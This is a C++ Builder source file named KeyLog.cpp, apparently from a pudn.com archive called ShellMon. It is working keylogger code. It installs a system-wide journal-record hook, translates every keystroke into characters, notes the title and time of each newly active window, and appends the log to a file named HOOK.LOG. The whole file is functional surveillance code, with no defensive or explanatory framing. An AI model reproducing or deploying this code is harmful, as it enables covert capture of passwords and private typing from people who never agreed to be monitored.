www.pudn.com > ShellMon.rar > KeyLog.cpp
//--------------------------------------------------------------------------- #include#pragma hdrstop #include "KeyLog.h" //--------------------------------------------------------------------------- #pragma package(smart_init) HWND g_hWnd = NULL; //接收窗口 HHOOK g_hLogHook = NULL; //钩子变量 HWND g_hLastFocus = NULL; //记录上一次得到焦点的窗口句柄 const int KeyPressMask = 0x80000000; //键盘掩码常量 char g_PrvChar; //保存上一次按键值 TStringList *HookList; // //安装日志钩子 void InstallHook(HWND hWnd) { if(g_hLogHook==NULL) { g_hLogHook = SetWindowsHookEx(WH_JOURNALRECORD, (HOOKPROC)JournalLogProc, HInstance,0); if( g_hLogHook) { HookList = new TStringList; } } g_hWnd = hWnd; } //卸载日志钩子 void UnInstallHook(void) { if(g_hLogHook != NULL) { UnhookWindowsHookEx(g_hLogHook); g_hLogHook=NULL; delete HookList; HookList = NULL; } } void SaveHookLog(AnsiString Log) { unsigned long Size; Size = HookList->Text.Length() + Log.Length(); if( Size >= 64 * 1024) { TFileStream *LogFile; if(FileExists("HOOK.LOG")) { LogFile = new TFileStream("HOOK.LOG",fmOpenWrite); } else { LogFile = new TFileStream("HOOK.LOG",fmCreate); } LogFile->Seek(0,soFromEnd); HookList->SaveToStream(LogFile); LogFile->Free(); HookList->Clear(); } SendMessage(g_hWnd,WM_KEYLOG,0,0); HookList->Add(Log); } //日志钩子回调函数 HOOKPROC JournalLogProc(int iCode,WPARAM wParam, LPARAM lParam) { if (iCode< 0 ) return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam); if (iCode == HC_ACTION) { EVENTMSG *pEvt=(EVENTMSG *)lParam; int i; HWND hFocus; //保存当前活动窗口句柄 char szTitle[256]; //当前窗口名称 char szTime[128]; //保存当前的日期和时间 if (pEvt->message == WM_KEYDOWN) { int vKey = LOBYTE(pEvt->paramL); // 取得虚拟键值 char ch; char str[10]; //取得当前活动窗口句柄 hFocus = GetActiveWindow(); if(g_hLastFocus != hFocus) //当前活动窗口是否改变 { GetWindowText(hFocus,szTitle,256); g_hLastFocus = hFocus; strcpy(szTime,DateTimeToStr(Now()).c_str()); //得到当前的日期时间 SaveHookLog(AnsiString(szTime) + " 当前活动窗口改变为: " + szTitle); } int iShift = GetKeyState(0x10); //测试SHIFT,CAPTION,NUMLOCK等键是否按下 int iCapital = GetKeyState(0x14); int iNumLock = GetKeyState(0x90); bool bShift = (iShift & KeyPressMask)==KeyPressMask; bool bCapital= (iCapital & 1)==1; bool bNumLock= (iNumLock & 1)==1; if (vKey >= 48 && vKey <= 57) // 数字0-9 { if (!bShift) { SaveHookLog( (char)('0' + vKey - 48)); } } if (vKey >= 65 && vKey <= 90) // A-Z (a-z) { if (!bCapital) { if (bShift) ch=vKey; else ch=vKey + 32; } else { if (bShift) ch=vKey + 32; else ch=vKey; } SaveHookLog(ch); } if (vKey >=96 && vKey <=105) // 小键盘0-9 { if (bNumLock) { SaveHookLog((char)('0' + vKey - 96)); } } if (vKey>=186 && vKey<=222) // 其他键 { switch (vKey) { case 186:if (!bShift) ch=';'; else ch=':'; break; case 187:if (!bShift) ch='='; else ch='+'; break; case 188:if (!bShift) ch=','; else ch='<'; break; case 189:if (!bShift) ch='-'; else ch='_'; break; case 190:if (!bShift) ch='.'; else ch=' >';break; case 191:if (!bShift) ch='/'; else ch='?'; break; case 192:if (!bShift) ch='`'; else ch='~'; break; case 219:if (!bShift) ch='['; else ch='{'; break; case 220:if (!bShift) ch='\\';else ch='|'; break; case 221:if (!bShift) ch=']'; else ch='}'; break; case 222:if (!bShift) ch='\'';else ch='\"';break; default: ch='n'; break; } if (ch!='n') { SaveHookLog( ch ); } } if (wParam >= 112 && wParam <= 123) // 功能键 [F1]-[F12] { str[0] = 'F'; str[1] = '1' + (wParam - 112); str[2] = '\0'; SaveHookLog(str); } if (vKey >=8 && vKey <=46) //方向键 { switch (vKey) { case 8: strcpy(str,"[BACK]"); break; case 9: strcpy(str,"[TAB]"); break; case 13:strcpy(str,"[ENTER]"); break; case 32:strcpy(str,"[SPACE]"); break; case 33:strcpy(str,"[PAGEUP]"); break; case 34:strcpy(str,"[PAGEDOWN]"); break; case 35:strcpy(str,"[END]"); break; case 36:strcpy(str,"[HOME]"); break; case 37:strcpy(str,"[LEFT]"); break; case 38:strcpy(str,"[UP]"); break; case 39:strcpy(str,"[RIGH]"); break; case 40:strcpy(str,"[DOWN]"); break; case 45:strcpy(str,"[INS]"); break; case 46:strcpy(str,"[DEL]"); break; default:ch = 'n';break; } if (ch!='n') { if (g_PrvChar != vKey) { SaveHookLog(str); g_PrvChar = vKey; } }//endif }//endif }//endif if(pEvt->message==WM_LBUTTONDOWN || pEvt->message ==WM_RBUTTONDOWN) { hFocus=GetActiveWindow(); if (g_hLastFocus!=hFocus) { g_hLastFocus=hFocus; GetWindowText(hFocus,szTitle,256); strcpy(szTime,DateTimeToStr(Now()).c_str()); SaveHookLog(AnsiString(szTime) + " 激活窗口 -> " + szTitle); } }//endif }//endif return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam); }